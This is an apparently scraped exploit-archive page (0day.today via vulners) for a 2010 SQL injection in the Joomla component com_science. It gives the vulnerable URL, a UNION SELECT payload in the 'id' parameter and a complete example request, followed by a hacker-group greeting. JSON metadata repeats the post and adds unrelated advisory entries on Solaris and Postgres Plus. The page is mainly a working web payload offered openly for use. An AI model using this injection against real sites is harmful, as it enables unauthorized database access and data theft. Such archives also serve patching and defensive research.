Search...

Joomla Component com_science SQL Injection Vulnerability

2010-03-28T00:00:00

ID 1337DAY-ID-11479
Type zdt
Reporter DevilZ TM
Modified 2010-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Joomla Component com_science SQL Injection Vulnerability
========================================================

# Title : Joomla Component com_science SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-03-28
 
[~]######################################### InformatioN #############################################[~]
  
[~] Title     : Joomla Component com_science SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : [email protected]
[~] Contact   : [email protected]
  
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_science&view=science&id=[SQL]
  
[~] ExploiT         :
  
-1 UNION SELECT 1,2,3,4,5
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_science&view=science&id=-1 UNION SELECT 1,2,3,4,5
 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks To My Best FriendS :
  
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
  
[~] IRANIAN Young HackerZ
  
[~]#########################################   FinisH :D   #############################################[~]



#  0day.today [2017-12-31]  #

JSON Vulners Source

Initial Source

{"hash": "f9b907149252e04a3cc265595b80e07fe735ea98dd9e144619410974b97e0ee5", "id": "1337DAY-ID-11479", "lastseen": "2017-12-31T23:14:48", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "8f2b4be6b5b6a914379ea131df1a8755", "key": "href"}, {"hash": "79be87f3f9b19ed79104532abfa8007b", "key": "modified"}, {"hash": "79be87f3f9b19ed79104532abfa8007b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dde70ef2217077c94df7ba19263efc96", "key": "reporter"}, {"hash": "e3a85a51e1c102553b5eedc06d4eabc7", "key": "sourceData"}, {"hash": "c84ef2a113897ccc3bf3edfb6a4afade", "key": "sourceHref"}, {"hash": "e9a3ec6418eea899a9732313278a9f77", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2017-12-31T23:14:48"}, "vulnersScore": 6.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/11479", "description": "Exploit for php platform in category web applications", "title": "Joomla Component com_science SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "e5c859fee722cc0109e1049af8ece44b7d0cf38d95c79ee0e7629fe58b791df5", "id": "1337DAY-ID-11479", "lastseen": "2016-04-20T01:05:27", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T01:05:27"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "79be87f3f9b19ed79104532abfa8007b", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e9a3ec6418eea899a9732313278a9f77", "key": "title"}, {"hash": "82d1fdae9a632d8cd48852629bf14a01", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "dde70ef2217077c94df7ba19263efc96", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e617e12a6c6c3021092d85893d7bbfaa", "key": "sourceData"}, {"hash": "79be87f3f9b19ed79104532abfa8007b", "key": "published"}, {"hash": "d3eab71c46cefa357c2824603028ccf4", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/11479", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Joomla Component com_science SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "========================================================\r\nJoomla Component com_science SQL Injection Vulnerability\r\n========================================================\r\n\r\n# Title : Joomla Component com_science SQL Injection Vulnerability\r\n# Author: DevilZ TM\r\n# Data : 2010-03-28\r\n \r\n[~]######################################### InformatioN #############################################[~]\r\n \r\n[~] Title : Joomla Component com_science SQL Injection Vulnerability\r\n[~] Author : DevilZ TM By D3v1l\r\n[~] Homepage : http://www.DEVILZTM.com\r\n[~] Email : Expl0it@DevilZTM.Com\r\n[~] Contact : D3v1l.blackhat@yahoo.com\r\n \r\n[~]######################################### ExploiT #############################################[~]\r\n \r\n[~] Vulnerable File :\r\n \r\nhttp://127.0.0.1/index.php?option=com_science&view=science&id=[SQL]\r\n \r\n[~] ExploiT :\r\n \r\n-1 UNION SELECT 1,2,3,4,5\r\n \r\n[~] Example :\r\n \r\nhttp://127.0.0.1/index.php?option=com_science&view=science&id=-1 UNION SELECT 1,2,3,4,5\r\n \r\n \r\n[~]######################################### ThankS To ... ############################################[~]\r\n \r\n[~] Special Thanks To My Best FriendS :\r\n \r\nExim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS\r\n \r\n[~] IRANIAN Young HackerZ\r\n \r\n[~]######################################### FinisH :D #############################################[~]\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2010-03-28T00:00:00", "references": [], "reporter": "DevilZ TM", "modified": "2010-03-28T00:00:00", "href": "http://0day.today/exploit/description/11479"}, "lastseen": "2016-04-20T01:05:27", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "========================================================\r\nJoomla Component com_science SQL Injection Vulnerability\r\n========================================================\r\n\r\n# Title : Joomla Component com_science SQL Injection Vulnerability\r\n# Author: DevilZ TM\r\n# Data : 2010-03-28\r\n \r\n[~]######################################### InformatioN #############################################[~]\r\n \r\n[~] Title : Joomla Component com_science SQL Injection Vulnerability\r\n[~] Author : DevilZ TM By D3v1l\r\n[~] Homepage : http://www.DEVILZTM.com\r\n[~] Email : [email\u00a0protected]\r\n[~] Contact : [email\u00a0protected]\r\n \r\n[~]######################################### ExploiT #############################################[~]\r\n \r\n[~] Vulnerable File :\r\n \r\nhttp://127.0.0.1/index.php?option=com_science&view=science&id=[SQL]\r\n \r\n[~] ExploiT :\r\n \r\n-1 UNION SELECT 1,2,3,4,5\r\n \r\n[~] Example :\r\n \r\nhttp://127.0.0.1/index.php?option=com_science&view=science&id=-1 UNION SELECT 1,2,3,4,5\r\n \r\n \r\n[~]######################################### ThankS To ... ############################################[~]\r\n \r\n[~] Special Thanks To My Best FriendS :\r\n \r\nExim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS\r\n \r\n[~] IRANIAN Young HackerZ\r\n \r\n[~]######################################### FinisH :D #############################################[~]\r\n\r\n\n\n# 0day.today [2017-12-31] #", "published": "2010-03-28T00:00:00", "references": [], "reporter": "DevilZ TM", "modified": "2010-03-28T00:00:00", "href": "https://0day.today/exploit/description/11479"}

{"securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "Unauthorized access to DBA Management Server (TCP/9000, TCP/9363)", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "id": "SECURITYVULNS:VULN:11479", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11479", "title": "Postgres Plus SQL authentication bypass", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nSun Solaris "in.rexecd" Privilege Escalation Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA18891\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/18891/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nPrivilege escalation\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nSun Solaris 10\r\nhttp://secunia.com/product/4813/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Sun Solaris, which can be\r\nexploited by malicious, local users to gain escalated privileges.\r\n\r\nThe vulnerability is caused due to an unspecified error in the\r\n"in.rexecd" daemon. This can be exploited by malicious users to\r\nexecute arbitrary commands with elevated privileges on Kerberos\r\nsystems.\r\n\r\nThe vulnerability has been reported in Solaris 10 on both x86 and\r\nSPARC platforms.\r\n\r\nSOLUTION:\r\nApply patches.\r\n\r\nSolaris 10 (SPARC Platform):\r\nApply patch 120329-02 or later.\r\n\r\nSolaris 10 (x86 Platform):\r\nApply patch 120330-02 or later.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102186-1\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-02-16T00:00:00", "published": "2006-02-16T00:00:00", "id": "SECURITYVULNS:DOC:11479", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11479", "title": "[SA18891] Sun Solaris "in.rexecd" Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}